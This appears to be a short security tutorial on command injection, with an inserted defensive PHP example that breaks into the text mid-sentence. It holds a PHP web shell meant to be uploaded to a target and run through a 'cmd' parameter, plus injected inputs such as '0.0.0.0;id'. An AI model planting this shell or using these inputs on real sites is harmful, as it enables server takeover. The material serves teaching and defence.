What is a Command Injection Attack?
It's an attack in which the attacker's objective is to execute arbitrary commands through a vulnerable application. Normally, the vulnerability arises when the application passes unsafe user-supplied data to a system shell.
People often think that Code Injection and Command Injection are the same, but they are quite different. Code Injection usually allows the attacker to add malicious code to the application and execute it remotely. Command Injection, however, executes commands through the application's existing functionality, without injecting any code into the application itself.
How does the attack work?
First, we can look for signs that the application may be vulnerable to Command Injection by examining the URL. A possibly vulnerable application would have a URL that looks something like the one below:
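To make the "unsafe user-supplied data sent to a system shell" pattern concrete, here is an added example (not code from the original post) that puts a vulnerable handler beside a hardened one. The ping use case, the function names and the sample inputs are assumptions chosen for illustration.

```php
<?php
// Added example: hypothetical diagnostic helper. Function names, the ping
// use case and the sample inputs are assumptions, not taken from the post.

// Vulnerable: the value is concatenated into a string that the shell parses,
// so any shell metacharacters in $host are interpreted by the shell.
function ping_vulnerable(string $host): string
{
    return (string) shell_exec('ping -c 1 ' . $host);
}

// Allow-list check: accept only a syntactically valid IPv4 or IPv6 address.
function is_valid_host(string $host): bool
{
    return filter_var($host, FILTER_VALIDATE_IP) !== false;
}

// Hardened: validate first, then run the binary without any shell.
function ping_hardened(string $host): string
{
    if (!is_valid_host($host)) {
        throw new InvalidArgumentException('host must be an IP address');
    }
    // The array form of proc_open (PHP 7.4+) executes the program directly,
    // so each element is passed as one argument and no shell is involved.
    $proc = proc_open(['ping', '-c', '1', $host], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ping');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return (string) $out;
}

// Constructed sample inputs: only the validation step is exercised here,
// so nothing is executed and the script runs offline.
if (PHP_SAPI === 'cli') {
    foreach (['0.0.0.0', '::1', 'id', '0.0.0.0;id'] as $input) {
        printf("%-12s %s\n", $input, is_valid_host($input) ? 'accepted' : 'rejected');
    }
}
```

Validation and shell-free execution are independent layers: the first rejects anything that is not an address, and the second ensures that a value which did slip through would still be treated as a single argument.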
http://example.com/index.php?pages=1
If the application has an upload function, we can try to upload a file that contains the following code:
<?php
// Passes the 'cmd' query parameter straight to the system shell
if (isset($_GET['cmd']))
{
    system($_GET['cmd']);
}
?>
Then, we can execute a command by requesting a URL such as http://example.com/index.php?cmd="any command"
Demonstration of the Injection attack
The demonstration is taken here
Another example in the application
We can also use Burp Suite to inspect the packet, which gives the output shown above.
We need to modify the payload by adding the { } symbols while the rest remains the same.
Let's replace 0.0.0.0 with the "id" command, which gives output that we were not expecting at all.